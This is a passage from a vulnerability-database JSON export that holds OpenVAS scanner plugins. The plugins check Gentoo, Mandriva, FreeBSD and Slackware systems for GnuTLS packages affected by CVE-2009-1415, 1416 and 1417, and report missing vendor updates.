script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-libs/gnutls\", unaffected: make_list(\"ge 2.6.6\"), vulnerable: make_list(\"lt 2.6.6\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:37:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1415", "CVE-2009-1416", "CVE-2009-1417"], "description": "The remote host is missing an update to gnutls\nannounced via advisory MDVSA-2009:116.", "modified": "2018-04-06T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:136141256231064129", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064129", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:116 (gnutls)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_116.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:116 (gnutls)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in gnutls:\n\nlib/pk-libgcrypt.c in libgnutls in GnuTLS before 2.6.6 does not\nproperly handle invalid DSA signatures, which allows remote attackers\nto cause a denial of service (application crash) and possibly have\nunspecified other impact via a malformed DSA key that triggers a (1)\nfree of an uninitialized pointer or (2) double free (CVE-2009-1415).\n\nlib/gnutls_pk.c in libgnutls in GnuTLS 2.5.0 through 2.6.5 generates\nRSA keys stored in DSA structures, instead of the intended DSA keys,\nwhich might allow remote attackers to spoof signatures on certificates\nor have unspecified other impact by leveraging an invalid DSA key\n(CVE-2009-1416).\n\ngnutls-cli in GnuTLS before 2.6.6 does not verify the activation\nand expiration times of X.509 certificates, which allows remote\nattackers to successfully present a certificate that is (1) not yet\nvalid or (2) no longer valid, related to lack of time checks in the\n_gnutls_x509_verify_certificate function in lib/x509/verify.c in\nlibgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup\n(CVE-2009-1417).\n\nThe updated packages have been patched to prevent this.\n\nAffected: 2008.1, 2009.0, 2009.1, Corporate 4.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:116\";\ntag_summary = \"The remote host is missing an update to gnutls\nannounced via advisory MDVSA-2009:116.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64129\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1415\", \"CVE-2009-1416\", \"CVE-2009-1417\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:116 (gnutls)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~2.3.0~2.5mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls26\", rpm:\"libgnutls26~2.3.0~2.5mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-devel\", rpm:\"libgnutls-devel~2.3.0~2.5mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls26\", rpm:\"lib64gnutls26~2.3.0~2.5mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls-devel\", rpm:\"lib64gnutls-devel~2.3.0~2.5mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~2.4.1~2.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls26\", rpm:\"libgnutls26~2.4.1~2.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-devel\", rpm:\"libgnutls-devel~2.4.1~2.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls26\", rpm:\"lib64gnutls26~2.4.1~2.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls-devel\", rpm:\"lib64gnutls-devel~2.4.1~2.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~2.6.4~1.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls26\", rpm:\"libgnutls26~2.6.4~1.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-devel\", rpm:\"libgnutls-devel~2.6.4~1.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls26\", rpm:\"lib64gnutls26~2.6.4~1.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls-devel\", rpm:\"lib64gnutls-devel~2.6.4~1.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~1.0.25~2.4.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls11\", rpm:\"libgnutls11~1.0.25~2.4.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls11-devel\", rpm:\"libgnutls11-devel~1.0.25~2.4.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls11\", rpm:\"lib64gnutls11~1.0.25~2.4.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls11-devel\", rpm:\"lib64gnutls11-devel~1.0.25~2.4.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:40:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1415", "CVE-2009-1416", "CVE-2009-1417"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200905-04.", "modified": "2018-04-06T00:00:00", "published": "2009-05-25T00:00:00", "id": "OPENVAS:136141256231064043", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064043", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200905-04 (gnutls)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in GnuTLS might result in a Denial of Service,\n spoofing or the generation of invalid keys.\";\ntag_solution = \"All GnuTLS users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-libs/gnutls-2.6.6'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200905-04\nhttp://bugs.gentoo.org/show_bug.cgi?id=267774\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200905-04.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64043\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-25 20:59:33 +0200 (Mon, 25 May 2009)\");\n script_cve_id(\"CVE-2009-1415\", \"CVE-2009-1416\", \"CVE-2009-1417\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200905-04 (gnutls)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-libs/gnutls\", unaffected: make_list(\"ge 2.6.6\"), vulnerable: make_list(\"lt 2.6.6\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:40:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1415", "CVE-2009-1416", "CVE-2009-1417"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:136141256231064785", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064785", "type": "openvas", "title": "FreeBSD Ports: gnutls", "sourceData": "#\n#VID b31a1088-460f-11de-a11a-0022156e8794\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID b31a1088-460f-11de-a11a-0022156e8794\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n gnutls\n gnutls-devel\n\nCVE-2009-1415\nlib/pk-libgcrypt.c in libgnutls in GnuTLS before 2.6.6 does not\nproperly handle invalid DSA signatures, which allows remote attackers\nto cause a denial of service (application crash) and possibly have\nunspecified other impact via a malformed DSA key that triggers a (1)\nfree of an uninitialized pointer or (2) double free.\n\nCVE-2009-1416\nlib/gnutls_pk.c in libgnutls in GnuTLS 2.5.0 through 2.6.5 generates\nRSA keys stored in DSA structures, instead of the intended DSA keys,\nwhich might allow remote attackers to spoof signatures on certificates\nor have unspecified other impact by leveraging an invalid DSA key.\n\nCVE-2009-1417\ngnutls-cli in GnuTLS before 2.6.6 does not verify the activation and\nexpiration times of X.509 certificates, which allows remote attackers\nto successfully present a certificate that is (1) not yet valid or (2)\nno longer valid, related to lack of time checks in the\n_gnutls_x509_verify_certificate function in lib/x509/verify.c in\nlibgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://article.gmane.org/gmane.comp.encryption.gpg.gnutls.devel/3515\nhttp://article.gmane.org/gmane.comp.encryption.gpg.gnutls.devel/3516\nhttp://article.gmane.org/gmane.comp.encryption.gpg.gnutls.devel/3517\nhttp://www.vuxml.org/freebsd/b31a1088-460f-11de-a11a-0022156e8794.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64785\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-1415\", \"CVE-2009-1416\", \"CVE-2009-1417\");\n script_bugtraq_id(34783);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: gnutls\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"gnutls\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.6.6\")<0) {\n txt += 'Package gnutls version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"gnutls-devel\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.7.8\")<0) {\n txt += 'Package gnutls-devel version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1415", "CVE-2009-1416", "CVE-2009-1417"], "description": "The remote host is missing an update to gnutls\nannounced via advisory MDVSA-2009:116.", "modified": "2017-07-06T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:64129", "href": "http://plugins.openvas.org/nasl.php?oid=64129", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:116 (gnutls)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_116.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:116 (gnutls)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in gnutls:\n\nlib/pk-libgcrypt.c in libgnutls in GnuTLS before 2.6.6 does not\nproperly handle invalid DSA signatures, which allows remote attackers\nto cause a denial of service (application crash) and possibly have\nunspecified other impact via a malformed DSA key that triggers a (1)\nfree of an uninitialized pointer or (2) double free (CVE-2009-1415).\n\nlib/gnutls_pk.c in libgnutls in GnuTLS 2.5.0 through 2.6.5 generates\nRSA keys stored in DSA structures, instead of the intended DSA keys,\nwhich might allow remote attackers to spoof signatures on certificates\nor have unspecified other impact by leveraging an invalid DSA key\n(CVE-2009-1416).\n\ngnutls-cli in GnuTLS before 2.6.6 does not verify the activation\nand expiration times of X.509 certificates, which allows remote\nattackers to successfully present a certificate that is (1) not yet\nvalid or (2) no longer valid, related to lack of time checks in the\n_gnutls_x509_verify_certificate function in lib/x509/verify.c in\nlibgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup\n(CVE-2009-1417).\n\nThe updated packages have been patched to prevent this.\n\nAffected: 2008.1, 2009.0, 2009.1, Corporate 4.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:116\";\ntag_summary = \"The remote host is missing an update to gnutls\nannounced via advisory MDVSA-2009:116.\";\n\n \n\nif(description)\n{\n script_id(64129);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1415\", \"CVE-2009-1416\", \"CVE-2009-1417\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:116 (gnutls)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~2.3.0~2.5mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls26\", rpm:\"libgnutls26~2.3.0~2.5mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-devel\", rpm:\"libgnutls-devel~2.3.0~2.5mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls26\", rpm:\"lib64gnutls26~2.3.0~2.5mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls-devel\", rpm:\"lib64gnutls-devel~2.3.0~2.5mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~2.4.1~2.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls26\", rpm:\"libgnutls26~2.4.1~2.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-devel\", rpm:\"libgnutls-devel~2.4.1~2.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls26\", rpm:\"lib64gnutls26~2.4.1~2.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls-devel\", rpm:\"lib64gnutls-devel~2.4.1~2.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~2.6.4~1.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls26\", rpm:\"libgnutls26~2.6.4~1.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-devel\", rpm:\"libgnutls-devel~2.6.4~1.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls26\", rpm:\"lib64gnutls26~2.6.4~1.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls-devel\", rpm:\"lib64gnutls-devel~2.6.4~1.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~1.0.25~2.4.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls11\", rpm:\"libgnutls11~1.0.25~2.4.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls11-devel\", rpm:\"libgnutls11-devel~1.0.25~2.4.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls11\", rpm:\"lib64gnutls11~1.0.25~2.4.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64gnutls11-devel\", rpm:\"lib64gnutls11-devel~1.0.25~2.4.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1415", "CVE-2009-1416"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2009-128-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231063965", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063965", "type": "openvas", "title": "Slackware Advisory SSA:2009-128-01 gnutls", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2009_128_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63965\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2009-1415\", \"CVE-2009-1416\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2009-128-01 gnutls\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(12\\.0|12\\.1|12\\.2)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2009-128-01\");\n\n script_tag(name:\"insight\", value:\"New gnutls packages are available for Slackware 12.0, 12.1, 12.2, and -current\nto fix security issues.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2009-128-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"gnutls\", ver:\"2.6.2-i486-2_slack12.0\", rls:\"SLK12.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"gnutls\", ver:\"2.6.2-i486-2_slack12.1\", rls:\"SLK12.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"gnutls\", ver:\"2.6.2-i486-2_slack12.2\", rls:\"SLK12.2\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": 